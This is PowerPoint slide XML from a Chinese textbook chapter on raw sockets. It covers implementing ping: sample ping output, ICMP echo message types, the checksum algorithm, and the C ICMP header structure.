            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>PING tucana.sina.com.cn (111.161.78.250) 56(84) bytes of data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>64 bytes from dns250.online.tj.cn (111.161.78.250): icmp_req=1 ttl=128 time=28.2 ms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>^C</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>--- tucana.sina.com.cn ping statistics ---</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>6 packets transmitted, 6 received, 0% packet loss, time</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>5009ms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>rtt min/avg/max/mdev = 28.199/28.763/30.349/0.744 ms</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1965593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13.6.1  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>协议格式</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ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>的客户端方式的类型为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>，代码值为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>，表示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>的回显请求。类型为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>，代码为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>时，是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>回显应答。校验和为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>位的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>crc16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>的算法。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7170" name="Picture 2" descr="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2953580"/>
            <a:ext cx="345409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068960"/>
            <a:ext cx="3826299" cy="2044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85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13.6.2  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>校验和函数</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TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>协议栈使用的校验算法是比较经典的，对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>位的数据进行累加计算，并返回计算结果。需要注意的是对奇数个字节数据的计算，是将最后的有效数据作为最高位的字节，低字节填充了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2750118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13.6.3  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>设置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>发送报文的头部</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="40000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>对于回显请求的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>报文，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>13.5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>节的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>结构可以简化为如下形式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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struct icmp</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u_int8_t  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>icmp_type;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消息类型</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u_int8_t  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>icmp_code;</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消息类型的子码</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u_int16_t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>icmp_cksum;</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校验和</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union</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRP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struct ih_idseq</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显示数据报</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u_int16_t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>icd_id;</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数据报</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ID</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u_int16_t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>icd_seq;</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数据报的序号</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}ih_idseq;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>}icmp_hun;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>#define</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>icmp_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>icmp_hun.ih_idseq.icd_id</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>#define</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>icmp_seq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>icmp_hun.ih_idseq.icd_seq</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>union</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u_int8_t    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>id_data[1];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数据</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}icmp_dun;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>#define</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>icmp_data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>icmp_dun.id_data</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31463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13.1  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>概    述</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1481328"/>
            <a:ext cx="8435280" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>原始套接字主要应用在底层网络编程上，同时也是网络黑客的必备手段。例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>sniffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>、拒绝服务（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>）、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>地址欺骗等都需要在原始套接字的基础上实现。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>原始套接字提供以下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>种标准套接字不具备的功能。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>使用原始套接字可以读</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IGMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>分组。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>使用原始套接字可以读写特殊的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>数据报，内核不处理这些数据报的协议字段。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>使用原始套接字，可以修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>数据和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>层之上的各层数据，构造自己的特定类型的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>的分组。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4047516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13.6.4  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>剥离</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>接受报文的头部</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icmp_unpack()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>用于剥离</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>头部，分析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>头部的值。判断是否为正确的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
